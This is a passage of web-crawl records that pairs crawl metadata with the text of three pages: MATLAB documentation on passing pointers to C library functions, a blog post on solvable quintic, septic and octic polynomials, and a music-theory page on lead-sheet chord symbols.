"https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-a701b5199b129c958b64f2583a869c1e_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-bf4e22fe2ee96995ff397deadc45adb6_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-a968daa9d3e2316722c449e8564a335e_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-453b874e6d1d6b471d6aa9a998a5a95d_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-9fcaac56e8adb8e922b8b0141fa6e967_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-909315230a08d3569d54d48052262a30_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-387bc32ba2d731f56de80916da2adf3c_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-1c3e0275f86a1f64a16b4e8238f54f89_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-30e40b3560531b59f37586cb1ede5778_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-56ceca4b72422bca7cbab1de472e874d_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-f7fbfc5a33fc6e3d8ef37359169437b0_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-830a5abd038e68e618c7a574601c553e_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-4436600509ffe9a46e83491ef7f6f6fb_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-1be640341f56f5ab1875e1931e2e5de7_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-144f30bd35437a5c1807e06f85d0ef4b_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-f7fbfc5a33fc6e3d8ef37359169437b0_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-04a0b73370f72eb40f380fb870d73dc5_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-86b4e576e08766d6891c3b68cf24a118_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-d5cfa90a29059c21b2cd18abe4a7c3b3_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-ff9b1119632f08be9ff7fa219d1b4ac7_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-c1faa31640ad7163fdd29849616d9389_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-caaecb51ac719235cf94092a10723a35_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-c3f77cd18c51fc6622a2624a89dae66b_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-f7fbfc5a33fc6e3d8ef37359169437b0_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-04a0b73370f72eb40f380fb870d73dc5_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-144f30bd35437a5c1807e06f85d0ef4b_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-86936311d91c1c07dcb0585c7ccfaa27_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-aad38941200d66f927b4def003a3f3dc_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-ab3078445ca3e9365f5f8d92a62e9e69_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-04a0b73370f72eb40f380fb870d73dc5_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-144f30bd35437a5c1807e06f85d0ef4b_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-ee0d727242cede2ba48c8d3c4c849723_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-8510c9ef211011acc00933cd701bed9e_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-a697c5d767cc7d956ca02a3243cabfa3_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-4916dc4f1511579a25976fa012c285d6_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-eec3b4e4e5469015b07f734ef12f7ec1_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-865826a3461ad8a09252e292df098c52_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-37dfdd0d755b57accf735a9d449559d8_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-922802023aae2d87fad79bcbfcbffc53_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-ee0d727242cede2ba48c8d3c4c849723_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-387bc32ba2d731f56de80916da2adf3c_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-267546e1bc8173b01c501fc60f1e305b_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-10f528525492de9591354f3e48730043_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-a697c5d767cc7d956ca02a3243cabfa3_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-a697c5d767cc7d956ca02a3243cabfa3_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-ee0d727242cede2ba48c8d3c4c849723_l3.svg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8870463,"math_prob":0.97834325,"size":2683,"snap":"2020-45-2020-50","text_gpt3_token_len":622,"char_repetition_ratio":0.117207915,"word_repetition_ratio":0.0,"special_character_ratio":0.2202758,"punctuation_ratio":0.12569316,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9927265,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170],"im_url_duplicate_count":[null,2,null,6,null,2,null,2,null,3,null,2,null,2,null,2,null,2,null,null,null,2,null,2,null,6,null,null,null,2,null,null,null,2,null,null,null,2,null,2,null,2,null,null,null,2,null,2,null,2,null,2,null,2,null,2,null,3,null,10,null,2,null,2,null,10,null,2,null,10,null,2,null,2,null,2,null,2,null,2,null,2,null,null,null,2,null,2,null,2,null,10,null,2,null,2,null,2,null,6,null,2,null,2,null,2,null,6,null,6,null,6,null,2,null,2,null,2,null,2,null,2,null,2,null,6,null,6,null,6,null,2,null,2,null,2,null,6,null,6,null,null,null,2,null,null,null,1,null,2,null,2,null,2,null,2,null,null,null,10,null,6,null,2,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-29T21:46:20Z\",\"WARC-Record-ID\":\"<urn:uuid:2b70513a-9549-434f-b40b-9e7a588441d4>\",\"Content-Length\":\"65166\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:f462dba9-f703-4e1b-a4ae-379f27318367>\",\"WARC-Concurrent-To\":\"<urn:uuid:62c4e4a6-1b88-466f-ae4f-7ac3be4876e0>\",\"WARC-IP-Address\":\"109.71.54.18\",\"WARC-Target-URI\":\"https://lovelylittlelemmas.rjprojects.net/limits-as-equalisers-of-products/\",\"WARC-Payload-Digest\":\"sha1:H3FZKR546PJKXIABWFHZP5CJY6D5KVDL\",\"WARC-Block-Digest\":\"sha1:VNCG5FBFBCX4EHYYYNWXUWEZFE2XU36K\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-45/CC-MAIN-2020-45_segments_1603107905965.68_warc_CC-MAIN-20201029214439-20201030004439-00676.warc.gz\"}"}
https://se.mathworks.com/help/matlab/matlab_external/pass-pointers.html
[ "## Pass Pointers Examples\n\n### `multDoubleRef` Function\n\nThe `multDoubleRef` function in the `shrlibsample` library multiplies the input by `5`.\n\n```EXPORTED_FUNCTION double *multDoubleRef(double *x) { *x *= 5; return x; }```\n\nThe input is a pointer to a `double`, and the function returns a pointer to a `double`. The MATLAB® function signature is:\n\nReturn TypeNameArguments\n```[lib.pointer, doublePtr]````multDoubleRef``(doublePtr)`\n\n### Pass Pointer of Type double\n\nThis example shows how to construct and pass a pointer to C function `multDoubleRef`.\n\nLoad the library containing the function.\n\n```if not(libisloaded('shrlibsample')) addpath(fullfile(matlabroot,'extern','examples','shrlib')) loadlibrary('shrlibsample') end```\n\nConstruct a pointer, `Xptr`, to the input argument, `X`.\n\n```X = 13.3; Xptr = libpointer('doublePtr',X);```\n\nVerify the contents of `Xptr`.\n\n`get(Xptr)`\n``` Value: 13.3000 DataType: 'doublePtr' ```\n\nCall the function and check the results.\n\n```calllib('shrlibsample','multDoubleRef',Xptr); Xptr.Value```\n```ans = 66.5000 ```\n\n`Xptr` is a handle object. Copies of this handle refer to the same underlying object and any operations you perform on a handle object affect all copies of that object. However, `Xptr` is not a C language pointer. Although it points to `X`, it does not contain the address of `X`. The function modifies the Value property of `Xptr` but does not modify the value in the underlying object `X`. The original value of `X` is unchanged.\n\n`X`\n```X = 13.3000 ```\n\n### Create Pointer Offset from Existing lib.pointer Object\n\nThis example shows how to create a pointer to a subset of a MATLAB vector `X`. The new pointer is valid only as long as the original pointer exists.\n\nCreate a pointer to a vector.\n\n```X = 1:10; xp = libpointer('doublePtr',X); xp.Value```\n```ans = 1×10 1 2 3 4 5 6 7 8 9 10 ```\n\nUse the lib.pointer plus operator (`+`) to create a pointer to the last six elements of `X`.\n\n```xp2 = xp + 4; xp2.Value```\n```ans = 1×6 5 6 7 8 9 10 ```\n\n### Multilevel Pointers\n\nMultilevel pointers are arguments that have more than one level of referencing. A multilevel pointer type in MATLAB uses the suffix `PtrPtr`. For example, use `doublePtrPtr` for the C argument ```double **```.\n\nWhen calling a function that takes a multilevel pointer argument, use a `lib.pointer` object and let MATLAB convert it to the multilevel pointer.\n\n### `allocateStruct` and `deallocateStruct` Functions\n\nThe `allocateStruct` function in the `shrlibsample` library takes a `c_structPtrPtr` argument.\n\n```EXPORTED_FUNCTION void allocateStruct(struct c_struct **val) { *val=(struct c_struct*) malloc(sizeof(struct c_struct)); (*val)->p1 = 12.4; (*val)->p2 = 222; (*val)->p3 = 333333; }```\n\nThe MATLAB function signatures are:\n\nReturn TypeNameArguments\n`c_structPtrPtr``allocateStruct``(c_structPtrPtr)`\n`voidPtr` `deallocateStruct``(voidPtr)`\n\n### Pass Multilevel Pointer\n\nThis example shows how to pass a multilevel pointer to a C function.\n\nLoad the library containing `allocateStruct` and `deallocateStruct`.\n\n```if not(libisloaded('shrlibsample')) addpath(fullfile(matlabroot,'extern','examples','shrlib')) loadlibrary('shrlibsample') end```\n\nCreate a `c_structPtr` pointer.\n\n`sp = libpointer('c_structPtr');`\n\nCall `allocateStruct` to allocate memory for the structure.\n\n`res = calllib('shrlibsample','allocateStruct',sp)`\n```res = struct with fields: p1: 12.4000 p2: 222 p3: 333333 ```\n\nFree the memory created by the `allocateStruct` function.\n\n`calllib('shrlibsample','deallocateStruct',sp)`\n\n### Return Array of Strings\n\nSuppose that you have a library, `myLib`, with a function, `acquireString`, that reads an array of strings. The function signature is:\n\nReturn TypeNameArguments\n`char**``acquireString``(void)`\n`char** acquireString(void)`\n\nThe following pseudo-code shows how to manipulate the return value, an array of pointers to strings.\n\n```ptr = calllib(myLib,'acquireString') ```\n\nMATLAB creates a `lib.pointer` object `ptr` of type `stringPtrPtr`. This object points to the first string. To view other strings, increment the pointer. For example, to display the first three strings, type:\n\n```for index = 0:2 tempPtr = ptr + index; tempPtr.Value end ```\n```ans = 'str1' ans = 'str2' ans = 'str3' ```" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5740452,"math_prob":0.8329379,"size":3958,"snap":"2022-40-2023-06","text_gpt3_token_len":1070,"char_repetition_ratio":0.15604451,"word_repetition_ratio":0.033101045,"special_character_ratio":0.24279939,"punctuation_ratio":0.14705883,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9905726,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-10-05T05:46:49Z\",\"WARC-Record-ID\":\"<urn:uuid:a08ae386-e852-444c-bed9-5613fe09e30e>\",\"Content-Length\":\"88347\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:dea307df-c03a-4d1d-840d-a185f7677c68>\",\"WARC-Concurrent-To\":\"<urn:uuid:af698f80-94aa-41e8-9784-9ec87899209d>\",\"WARC-IP-Address\":\"23.221.210.185\",\"WARC-Target-URI\":\"https://se.mathworks.com/help/matlab/matlab_external/pass-pointers.html\",\"WARC-Payload-Digest\":\"sha1:67QOKV77XVNMPY55H2NKQBFFMVYJHZE5\",\"WARC-Block-Digest\":\"sha1:KXJ5IDDBRDMPXXBUKCEMZJUVBPLZD2LV\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-40/CC-MAIN-2022-40_segments_1664030337537.25_warc_CC-MAIN-20221005042446-20221005072446-00219.warc.gz\"}"}
https://tpiezas.wordpress.com/tag/radicals/
[ "## Posts Tagged ‘radicals’\n\n### Solvable Quintics, Part 2\n\nIn the 1850’s, Jerrard showed that a Tschirnhausen transformation could reduce in radicals the general quintic into one missing three terms,", null, "$\\text{(1)}\\;\\; x^5+5ax+4b = 0$\n\nIn 1864, Bring independently would do the same. It is now known as the Bring-Jerrard quintic.  Such a reduction is important because it proved that a formula for the general quintic does exist, albeit it went beyond radicals and used elliptic functions, as was first done by Hermite.\n\nIn 1885, Runge et al showed that all solvable quintics with rational coefficients have the form,", null, "$x^5+5\\,\\frac{4u+3}{u^2+1}xz^4+4\\,\\frac{(2u+1)(4u+3)}{u^2+1}z^5 = 0$\n\nA century later, Spearman and Williams gave their version,", null, "$x^5+5\\,\\frac{4v+3}{v^2+1}xz^4+4\\,\\frac{-2v+11}{\\,v^2+1}z^5 = 0$\n\nSo which is it? It turns out they are two sides of the same coin. Using the Spearman-Williams parametrization, let,", null, "$a = \\frac{4v+3}{v^2+1}z^4$", null, "$b = \\frac{-2v+11}{\\,v^2+1}z^5$\n\nand eliminating v between them using resultants, one gets,", null, "$\\text{(2)}\\;\\; 4az^6+8bz^5-5a^2z^2+2abz-b^2 = 0$\n\nThis is one of the simplest sextic resolvents for the quintic:  given {a, b}, if one can solve for z, then is solvable. Since is only a quadratic for b, we can easily solve for it,", null, "$b = az+4z^5+2z\\sqrt{(a+z^4)(-a+4z^4)}$\n\nStill let,", null, "$a= \\frac{4v+3}{v^2+1}z^4$\n\nand substituting it into the positive case of the square root yields the b of the 1885 version, while the negative case gives the b of the 1994 one, proving that they are indeed two sides of the same coin.\n\n### A Tale of Three Solvable Octics\n\nThe following three cute irreducible octics are solvable,", null, "$\\text{(1)}\\;\\; x^8-5x-5 = 0$", null, "$\\text{(2)}\\;\\; x^8-44x-33 = 0$", null, "$\\text{(3)}\\;\\; x^8-x^7+29x^2+29 = 0$\n\nHowever, each needs to be solved in a different way: they need a quadratic, quartic, and septic subfield, respectively.\n\nThe first is the easiest, it factors over", null, "$\\sqrt{5}$ into two quartics.  The second does not factor over a square root extension, but factors into four quadratics,", null, "$x^2+vx -(2v^3-7v^2+5v+33)/13 = 0$\n\nwhere the coefficients are determined by the quartic,", null, "$v^4+22v+22 = 0$\n\nThe command,\n\nResultant[x^2+vx -(2v^3-7v^2+5v+33)/13 , v^4+22v+22 ,v]\n\ndone in Mathematica or in www.wolframalpha.com will eliminate the variable v and recover .  The first two octics are by this author.  (Any other example for the second kind with small coefficients?)\n\nThe third (by Igor Schein) is the hardest, as it needs a septic subfield. Interestingly though, the solution involves the 29th root of unity. Given,", null, "$x^8-x^7+29x^2+29 = 0$\n\nThen,", null, "\\begin{aligned} x_1 &= (1+(a-b-c-d+e-f-g))/8\\\\ x_2 &= (1-(a-b-c-d-e+f+g))/8\\\\ x_3&= (1-(a+b-c+d+e-f+g))/8\\\\ x_4&= (1+(a+b-c+d-e+f-g))/8\\\\ x_5&= (1-(a+b+c-d+e+f-g))/8\\\\ x_6&= (1+(a+b+c-d-e-f+g))/8\\\\ x_7&= (1-(a-b+c+d-e-f-g))/8\\\\ x_8&= (1+(a-b+c+d+e+f+g))/8 \\end{aligned}\n\nwhere the 7 constants {a, b, c, d, e, f, g} is the square root of the appropriate root", null, "$z_i$ of the solvable septic,", null, "$z^7-7z^6-2763z^5-19523z^4+1946979z^3+34928043z^2+\\\\119557031z-3247^2 = 0$\n\nnamely,", null, "\\begin{aligned} a &\\approx \\sqrt{ -26.98}\\\\ b &\\approx \\sqrt{ -26.95}\\\\ c &\\approx \\sqrt{ -19.71}\\\\ d &\\approx \\sqrt{ -4.78}\\\\ e &\\approx \\sqrt{ 0.08}\\\\ f &\\approx \\sqrt{ 36.91}\\\\ g &\\approx \\sqrt{ 48.43}\\\\ \\end{aligned}\n\nNote that,", null, "$(8x_3-1)+(8x_4-1)+(8x_5-1)+(8x_6-1) = -4e$\n\nhence one can use the roots of this octic to express the roots of its resolvent septic, and vice versa.  In terms of radicals, Peter Montgomery expressed the septic roots", null, "$z_i$ as,", null, "\\begin{aligned}\\tfrac{1}{4}(z-1) &= 2(w^{11}+w^{13}+w^{16}+w^{18})-2(w+w^{12}+w^{17}+w^{28})\\\\ &+(w^3+w^7+w^{22}+w^{26})-(w^2+w^5+w^{24}+w^{27})\\\\ &+(w^4+w^{10}+w^{19}+w^{25})-(w^8+w^9+w^{20}+w^{21}) \\end{aligned}\n\nwhere w is any complex root of unity (excluding w = 1) such that", null, "$w^{29}=1$. For example,", null, "$w = \\exp(2\\pi i\\cdot4/29)$ will yield the value for", null, "$z_1 \\approx -26.98$,  and so on.\n\n### A Family of Solvable Quintics and Septics\n\nDefine,", null, "$x = \\frac{-\\sqrt{2}\\,\\eta(2\\tau)}{\\zeta_{48}\\,\\eta(\\tau)}$\n\nwhere", null, "$\\eta$ is the Dedekind eta function, and", null, "$\\zeta_{48}$ is the 48th root of unity.  Then for", null, "$\\tau = \\frac{1+\\sqrt{-d}}{2}$ for d = {47, 103}, x is a root of the quintics,", null, "$x^5-2x^4+2x^3-x^2+1 = 0$", null, "$x^5-2x^4+3x^3-3x^2+x+1 = 0$\n\nrespectively. Note that the class number h(d) of both is 5.  It turns out these belong to a family of solvable quintics found by Kondo and Brumer,", null, "$x^5-2x^4+2x^3-x^2+1 = nx(x-1)^2$\n\nfor any n, and where the two examples are n = {0, -1}.  A similar one for septics can be deduced from the examples in Kluner’s A Database For Number Fields as,", null, "$x^7-2x^6+x^5-x^4-5x^2-6x-4 = n(x-1)x^2(x+1)^2$\n\nwith discriminant,", null, "$d = 4^4(4n^3+99n^2+34n+467)^3$ .\n\nThe case n = 0 implies d = 467 and, perhaps not surprisingly, the class number of h(-467) = 7. However, since 467 does not have form 8m+7, then the eta quotient will be not be an algebraic number of degree h(-d).\n\nTo find a solvable family, it’s almost as if all you need is to find one right solvable equation, affix the right n-multiple of a polynomial on the RHS, and the whole family will remain solvable.\n\n### Solvable quintics\n\nHere is a nifty sufficient but not necessary condition on whether a quintic is solvable in radicals or not.  Given,", null, "$x^5+10cx^3+10dx^2+5ex+f = 0$\n\nIf there is an ordering of its roots such that,", null, "$x_1 x_2 + x_2 x_3 + x_3 x_4 + x_4 x_5 + x_5 x_1 - \\\\(x_1 x_3 + x_3 x_5 + x_5 x_2 + x_2 x_4 + x_4 x_1) = 0$\n\nor alternatively, its coefficients are related by,", null, "$-25c^6-40c^3d^2-16d^4+35c^4e+\\\\28cd^2 e -11c^2e^2+e^3-2c^2df-2def+cf^2 = 0$\n\nthen is solvable as,", null, "$x = z_1^{1/5}+z_2^{1/5}+z_3^{1/5}+z_4^{1/5}$\n\nwhere the", null, "$z_i$ are the roots of the simple quartic,", null, "$z^4+fz^3+(2c^5-5c^3e-4d^2e+ce^2+2cdf)z^2-c^5fz+c^{10} = 0$\n\nNote that in fact is the constant term of Cayley’s resolvent sextic and is only quadratic in f.  Using another relation among the", null, "$x_i$, Dummit’s resolvent has a constant term that is already a quartic in f, hence the choice of relation matters.\n\nExample 1: This family of quintics by this author satisfies ,", null, "$x^5+10x^3+5(n^2+3n+18)x^2-5(n^3+n^2+15n-14)x+\\\\(n^4-n^3+37n^2+441) = 0$\n\nLet n = 1, and we have,", null, "$x^5+10x^3+110x^2-15x+478 = 0$\n\nQuartic is,", null, "$z^4+478z^3+11994z^2-478z+1 = 0$\n\nsuch that,", null, "$x = z_1^{1/5}+z_2^{1/5}+z_3^{1/5}+z_4^{1/5} = -4.50991\\dots$\n\nExample 2: Another good example of is Emma Lehmer’s quintic,", null, "$y^5 +n^2y^4-(2n^3+6n^2+10n+10)y^3+\\\\(n^4+5n^3+11n^2+15n+5)y^2+(n^3+4n^2+10n+10)y+1$\n\nThe linear transformation,", null, "$y = x-n^2/5$\n\nwill reduce it into the form of , and it will then be seen its coefficients obey . As a particular example, let n = 5 and we have the reduced form,", null, "$x^5-710x^3+11005x^2-59640x+108701 = 0$\n\nLet its roots be,", null, "$(x_1, x_2, x_3, x_4, x_5) \\approx (-33.15,\\; 4.83,\\; 12.16,\\; 4.99,\\; 11.16)$\n\nand we find that indeed it obeys .\n\nUnfortunately, no similar simple relation between the coefficients of a solvable septic, or 7th degree equation, is yet known." ]
[ null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9475464,"math_prob":0.99995613,"size":1163,"snap":"2019-35-2019-39","text_gpt3_token_len":281,"char_repetition_ratio":0.11216566,"word_repetition_ratio":0.02,"special_character_ratio":0.22871883,"punctuation_ratio":0.12288135,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99997616,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-09-16T16:11:53Z\",\"WARC-Record-ID\":\"<urn:uuid:4a92eb79-74b6-49a9-9d95-49bef194b566>\",\"Content-Length\":\"62736\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:312e949e-6869-458b-9f45-55638154a3c1>\",\"WARC-Concurrent-To\":\"<urn:uuid:27f23fd7-a60f-43fc-b106-4267d098ca15>\",\"WARC-IP-Address\":\"192.0.78.13\",\"WARC-Target-URI\":\"https://tpiezas.wordpress.com/tag/radicals/\",\"WARC-Payload-Digest\":\"sha1:2PCYJZBGIEUSFVS4EE7S5WCFLMVM5UOW\",\"WARC-Block-Digest\":\"sha1:37HSSBQMOBGNDW4SOQBXYXO2U6P5CPOF\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-39/CC-MAIN-2019-39_segments_1568514572879.28_warc_CC-MAIN-20190916155946-20190916181946-00484.warc.gz\"}"}
http://musictheory.pugetsound.edu/mt21c/LeadSheetSymbols.html
[ "Lead-sheet symbols (also known as “lead-sheet notation” and “lead-sheet chord symbols”) are often used as shorthand for chords in popular music and jazz. These symbols allow a guitarist or pianist to choose how to “voice” the chords, i.e., how they want to arrange the notes.", null, "Lead-sheet symbols for triads communicate the root and quality of a chord.\n\n Lead-sheet Symbol Chord Quality Notes in the Chord $\\left.\\text{F}\\right.$ major $\\text{F}$–$\\text{A}$–$\\text{C}$ $\\left.\\text{G}\\text{m}\\right.$ minor $\\text{G}$–$\\text{B}^♭$–$\\text{D}$ $\\left.\\text{D}^{\\circ}{}\\right.$ diminished $\\text{D}$–$\\text{F}$–$\\text{A}^♭$ $\\left.\\text{C}{+}\\right.$ augmented $\\text{C}$–$\\text{E}$–$\\text{G}^♯$\n\nHere is a musical example with lead-sheet symbols and guitar tablature.\n\nAs you can see in the example above, major triads are represented by an uppercase letter ($\\left.\\text{A}\\right.$, $\\left.\\text{E}\\right.$, and $\\left.\\text{D}\\right.$) while minor triads are represented with the root in uppercase followed by a lowercase “m” (e.g., $\\left.\\text{F}^♯{}\\text{m}\\right.$). Diminished triads are represented by including the diminished symbol ($\\left.\\text{}^{\\circ}{}\\right.$) after the chord root (e.g., $\\left.\\text{C}^{\\circ}{}\\right.$) while augmented triads are represented by including the augmented symbol after the root ($\\left.\\text{C}{+}\\right.$)." ]
[ null, "http://musictheory.pugetsound.edu/mt21c/images/unit1/triads-voicings-of-C-major-triad-B.svg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.88519967,"math_prob":0.9970616,"size":1443,"snap":"2019-43-2019-47","text_gpt3_token_len":459,"char_repetition_ratio":0.20847811,"word_repetition_ratio":0.025806451,"special_character_ratio":0.32640332,"punctuation_ratio":0.15498155,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99848694,"pos_list":[0,1,2],"im_url_duplicate_count":[null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-11-22T15:14:21Z\",\"WARC-Record-ID\":\"<urn:uuid:c41b3353-c557-43b1-8ea3-c615c5708ca6>\",\"Content-Length\":\"43940\",\"Content-Type\":\"application/http; 